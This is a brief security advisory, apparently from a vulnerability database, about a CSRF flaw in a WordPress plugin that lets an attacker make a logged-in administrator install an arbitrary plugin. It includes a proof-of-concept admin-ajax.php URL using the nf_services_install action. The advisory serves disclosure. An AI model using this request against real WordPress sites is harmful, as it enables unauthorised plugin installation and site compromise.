The plugin is affected by a Cross-Site Request Forgery (CSRF) which could allow attackers to make a logged administrator install an arbitrary plugin from the WordPress repository.
http://example.com/wp-admin/admin-ajax.php?action=nf_services_install&plugin=wpscan&install_path=wpscan/wpscan.php